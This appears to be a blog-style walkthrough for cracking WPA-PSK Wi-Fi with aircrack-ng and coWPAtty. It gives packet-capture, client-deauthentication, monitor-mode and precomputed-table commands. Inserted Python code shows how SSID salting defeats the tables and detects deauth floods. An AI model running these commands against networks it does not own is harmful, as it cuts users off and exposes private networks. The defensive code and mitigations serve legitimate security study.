NOTE: This page is for educational purposes only! In fact, it's for PRIVATE educational purposes only. It is not intended for public consumption. Unless these procedures are performed on either A) equipment that you 100% own and control (both AP and client side) or B) you are a professional wireless security auditor with the appropriate liability waivers in place and a good working knowledge of all applicable laws, it is a BAD idea for you to duplicate any of this as you may be in violation of the law.
that being said…
First things first, fire up bit torrent and either head over to Church of WiFi and grab the WPA-PSK and coWPAtty tables, or get them from the mirrored links below:
Church of Wifi WPA-PSK Rainbow Tables torrent (7gig)
Church of Wifi Uber coWPAtty lookup tables (34 gig)
Start downloading… it'll take a while!
RECON:
- Scope out your target. Fire up kismet (or iwlist) to determine what channel and SSID your target is using
- Start capturing packets: airodump-ng --channel 11 -w capture.log ath1
- While capturing, pick a client and deauth them a couple of times: (see below)
- ./cowpatty -r capture-log.cap -d linksys.hash linksys
- Nuts, the download isn't done… that's where we'd get the linksys.hash file.
- /tmp/genpmk -f /media/disk/dictionaries/all/ALL.txt -d /media/disk/SSID_r3a11yS3cur3_ALL.txt_hash -s r3a11yS3cur3
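The genpmk/coWPAtty step above only makes sense once you see what the `-s` (SSID) argument does. The following Python is an added illustration, not code from this page or from the coWPAtty project: WPA-PSK derives the PMK with PBKDF2-HMAC-SHA1 using the SSID as the salt, so a table precomputed for "linksys" matches nothing on a network with any other SSID. The candidate list and the second SSID are constructed for the example; the known-answer vector is the one published in IEEE 802.11i Annex H.

```python
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by the WPA-PSK specification
PMK_LEN = 32               # 256-bit PMK

# Known-answer vector from IEEE 802.11i Annex H: passphrase "password", SSID "IEEE".
KNOWN_VECTOR = ("password", "IEEE",
                "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt: a precomputed table is only valid for the SSID it was built for."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    ssid_bytes = ssid.encode()
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1..32 bytes")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid_bytes,
                               PBKDF2_ITERATIONS, PMK_LEN)


def self_check() -> bool:
    """Confirm the derivation against the published 802.11i test vector."""
    passphrase, ssid, expected_hex = KNOWN_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


def build_table(ssid: str, candidates) -> dict:
    """The work genpmk front-loads for one SSID: PMK -> passphrase for every candidate."""
    return {derive_pmk(c, ssid): c for c in candidates}


def table_hits_for_ssid(table: dict, ssid: str, candidates) -> int:
    """Count how many of the same candidates a table built for another SSID would match.
    With a non-default SSID the answer is zero, which is the whole mitigation."""
    return sum(1 for c in candidates if derive_pmk(c, ssid) in table)


# Constructed candidate list for the demonstration (not a real dictionary).
CONSTRUCTED_CANDIDATES = ["password", "letmein1", "qwertyuiop"]

if __name__ == "__main__":
    print("802.11i test vector ok:", self_check())
    linksys_table = build_table("linksys", CONSTRUCTED_CANDIDATES)
    print("hits on SSID 'linksys':      ",
          table_hits_for_ssid(linksys_table, "linksys", CONSTRUCTED_CANDIDATES))
    print("hits on SSID 'r3a11yS3cur3': ",
          table_hits_for_ssid(linksys_table, "r3a11yS3cur3", CONSTRUCTED_CANDIDATES))
```

The 4096-iteration PBKDF2 is the only thing that makes a dictionary run slow, and the table trades that cost for disk space once per SSID. A network owner cannot change the iteration count, but can pick an SSID that appears in no table and a long random passphrase that appears in no dictionary.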
Deauthing
- aireplay-ng --deauth 1 -a 00:0F:B5:38:BA:20 -c 00:17:3F:17:9E:E2 ath1
- where the -a mac is the mac of the AP, and the -c mac is the mac of the target/victim wifi client
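Deauthentication frames are unauthenticated management frames, so the AP side cannot stop a forged one, but a burst of them between one address pair is easy to see from a monitor-mode capture. The detector below is an added example, not part of the original page or of the aircrack-ng suite: it parses the 802.11 management header, pulls the reason code from deauth/disassoc frames, and alerts when a transmitter/receiver pair exceeds a count inside a sliding window. The MAC addresses, timestamps and frames are all constructed inline so it runs offline; in practice the frames would come from a pcap taken on the monitoring interface.

```python
import struct
from collections import defaultdict, deque

# 802.11 management-frame subtypes (frame type 0)
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def parse_mgmt_frame(frame: bytes):
    """Decode the 24-byte 802.11 MAC header of a management frame.
    Returns None for anything that is not a version-0 management frame."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, (fc0 >> 4) & 0x0F
    if version != 0 or ftype != 0:
        return None
    hdr = {
        "subtype": subtype,
        "da": frame[4:10],       # addr1: receiver
        "sa": frame[10:16],      # addr2: transmitter (trivially spoofable)
        "bssid": frame[16:22],   # addr3
        "seq": struct.unpack("<H", frame[22:24])[0] >> 4,
        "reason": None,
    }
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= 26:
        hdr["reason"] = struct.unpack("<H", frame[24:26])[0]  # little-endian reason code
    return hdr


def detect_deauth_flood(frames, window_s=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).
    One alert per (transmitter, receiver) pair that sends at least `threshold`
    deauth/disassoc frames inside a sliding window. A single deauth is normal roaming."""
    recent = defaultdict(deque)   # (sa, da) -> timestamps inside the window
    alerts = {}
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        hdr = parse_mgmt_frame(raw)
        if hdr is None or hdr["subtype"] not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue
        key = (hdr["sa"], hdr["da"])
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(key, {
                "transmitter": mac_str(hdr["sa"]), "receiver": mac_str(hdr["da"]),
                "bssid": mac_str(hdr["bssid"]), "first_seen": q[0],
                "reason_codes": set(), "count": 0, "last_seen": ts})
            a["count"] = len(q)
            a["last_seen"] = ts
            a["reason_codes"].add(hdr["reason"])
    return list(alerts.values())


def build_mgmt_frame(subtype, da, sa, bssid, seq, reason=None) -> bytes:
    """Assemble a minimal management frame (no FCS) for the constructed sample below."""
    frame = bytes([subtype << 4, 0x00]) + b"\x00\x00" + da + sa + bssid
    frame += struct.pack("<H", seq << 4)
    if reason is not None:
        frame += struct.pack("<H", reason)
    return frame


# Constructed, locally administered MACs: one AP/client pair under attack, one quiet pair.
AP, CLIENT = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
AP2, CLIENT2 = bytes.fromhex("020000000003"), bytes.fromhex("020000000004")
BROADCAST = b"\xff" * 6

SAMPLE_FRAMES = [(0.0, build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP, AP, 1))]
# Eight deauths in 0.35 s claiming to come from the AP, reason code 7 (constructed values).
SAMPLE_FRAMES += [(1.0 + i * 0.05, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, 100 + i, 7))
                  for i in range(8)]
# One deauth with reason 3 ("station is leaving") on the other network: ordinary behaviour.
SAMPLE_FRAMES.append((30.0, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT2, AP2, AP2, 7, 3)))

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"deauth flood {alert['transmitter']} -> {alert['receiver']}: "
              f"{alert['count']} frames, reasons {sorted(alert['reason_codes'])}")
```

The threshold and window are the knobs to tune against your own traffic: a client that roams between APs will produce a deauth or two, never dozens in a few hundred milliseconds. The durable fix is 802.11w (protected management frames), which authenticates deauth/disassoc frames so a forged one is dropped by the client.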
Monitor Mode
- on ATTACK box, create a monitor interface "wlanconfig ath1 create wlandev wifi0 wlanmode monitor" and then "ifconfig ath1 up" (assuming that ath1 is the monitoring interface that was just created)
- run 'ifconfig ath0 up; iwconfig ath0 mode Monitor channel <#>'
————-